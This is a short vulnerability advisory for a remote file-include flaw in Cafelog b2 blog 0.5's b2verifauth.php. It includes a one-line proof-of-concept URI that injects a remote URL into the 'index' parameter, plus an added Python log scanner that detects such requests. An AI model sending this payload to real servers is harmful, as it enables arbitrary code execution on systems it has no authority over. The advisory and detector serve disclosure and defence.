Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability
BID:21749
Info
| Bugtraq ID: | 21749 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2006 12:00AM |
| Updated: | Jan 02 2007 09:46PM |
| Credit: | mdx is credited with the discovery of this vulnerability. |
| Vulnerable: | Cafelog b2 blog 0.5 |
| Not Vulnerable: | |
Discussion
The 'b2 blog' program is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
Version 0.5 and prior are vulnerable to this issue.
Exploit / POC
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.site.com/b2verifauth.php?index=http://www.example2.com
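For defenders reviewing web server logs, the sketch below flags requests that match the pattern in the proof-of-concept URI: a request for b2verifauth.php whose 'index' parameter carries a URL. It is an added example, not part of the original advisory; the log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Dec/2006:12:00:01 +0000] "GET /b2verifauth.php?index=http://www.example2.com HTTP/1.1" 200 512',
    '192.0.2.11 - - [26/Dec/2006:12:00:05 +0000] "GET /blog/B2VerifAuth.php?index=hTTp%3A%2F%2Fwww.example2.com%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [26/Dec/2006:12:00:09 +0000] "GET /b2verifauth.php?index=2 HTTP/1.1" 200 512',
    '192.0.2.13 - - [26/Dec/2006:12:00:12 +0000] "GET /index.php?ref=http://www.example2.com HTTP/1.1" 200 512',
    '192.0.2.14 - - [26/Dec/2006:12:00:15 +0000] "GET /b2verifauth.php?index=%2568ttp://www.example2.com HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that begins with scheme:// (http, https, ftp, ...).
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so encoded probes are also matched."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_rfi_attempt(log_line):
    """True if the line requests b2verifauth.php with a URL in 'index'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    target = urlsplit(m.group(1))
    # Compare case-insensitively: some filesystems resolve any casing.
    if not fully_decode(target.path).lower().endswith('/b2verifauth.php'):
        return False
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name.lower() == 'index' and REMOTE_RE.match(fully_decode(value)):
            return True
    return False

def find_rfi_attempts(lines):
    """Return the client address (first log field) of each flagged line."""
    return [line.split()[0] for line in lines if is_rfi_attempt(line)]
```

Only the request line is inspected, so a value sent in a POST body would not appear in these logs.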
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- b2 blog home page (Cafelog)